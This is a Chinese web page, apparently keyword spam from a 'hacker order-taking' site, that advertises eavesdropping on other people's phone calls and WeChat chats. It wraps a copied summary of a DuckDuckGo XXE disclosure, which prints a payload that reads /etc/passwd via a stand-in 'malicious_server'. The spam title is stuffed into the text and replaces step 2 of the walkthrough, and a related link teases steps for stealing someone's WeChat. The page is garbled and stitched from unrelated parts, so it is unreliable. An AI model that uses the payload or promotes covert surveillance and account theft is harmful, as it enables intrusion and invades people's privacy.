窃听别人手机的通话_窃听别人微信聊天记录

访客4年前关于黑客接单907

窃听别人手机的通话_窃听别人微信聊天记录

近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。

DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。

漏洞详情

漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。

只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。

而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。

具体步骤如下

1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。

<?xm l version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><creds> <user>&xxe;</user> <pass>mypass</pass></creds>

窃听别人手机的通话_窃听别人微信聊天记录

2.窃听别人手机的通话_窃听别人微信聊天记录

3.返回的页面可以看到xm l文件解析结果

在确认了漏洞后,DuckDuckGo工作人员也对其表示了感谢。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:窃听别人手机的通话_窃听别人微信聊天记录

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA- *** 空间安全搜索引擎、FOEYE- *** 空间检索系统、NOSEC-安全讯息平台。

为您提供: *** 空间测绘、企业资产收集、企业威胁情报、应急响应服务

标签: 好话题

相关文章

网络个人信息泄露&amp;quot;暗箭难防&amp;quot; 如何保证&amp;quot;我就是我&amp;quot;_我就是我

在手机App中植入安全漏洞,再通过电脑端软件操作,只需几秒钟,工作人员便可控制“千里之外”的手机摄像头、扬声器进行偷拍、窃听,一场现实版“窃听风云”在2019年网络安全宣传周上的网络安全博览会互动体验...

5G时代网络安全产业爆发式增长_5G网络

4月15日是第四个全民国家安全教育日,作为国家安全的重要一环,现如今网络安全形势日益严峻,网络安全产业的创新和发展不容忽视。近日,第三届“中国网络安全与信息产业金智奖”在北京发布。多位院士专家、企业高...

平遥男子网络赌博被骗几十万,坦言:十分钟上瘾,半个月倾家荡产!_高利贷

相信很多朋友都接触过如下图这样的宣传文章,这些文章都有一个共同点,就是用一些虚构的案例,或者煽动性的话语去吸引网民去添加他们的微信。例如XX单亲妈妈月入十万,XX小伙子月入五万等等。如果有人对此感...

百度花十亿打造春晚红包活动,外链被微信封杀_位置

(原标题:百度花了十亿打造的春晚红包活动,外链立马就被微信封杀) 每到过年期间大家可能才会端坐在电视机面前好好地看上一会电视,那么逢年过节正是互联网品牌宣传好时机。最近百度与中央电视台达成春晚独...

万豪事件最新回应,将受害者数量上限缩小到3.8亿_人肉

近日,万豪国际酒店公布了对其被入侵数据库调查的最新进展,相较于2018年11月30日所披露的“5亿喜达屋客户信息遭到泄露”的信息,此次公告略微缩减了受害用户的数量——将受害用户的范围缩小为3.8亿,包...

「手机上怎么盗别人的微信呢」如何盗别人微信软件 6大步骤

第三方,对于很多结婚的女性来说,是一个非常苛刻的词,因为第三方,一些女性的婚姻和家庭处于破裂的边缘。 「手机上怎么盗别人的微信呢」如何盗别人微信软件 1.那么,婚姻有第三者,女人该怎么办?如何挽救...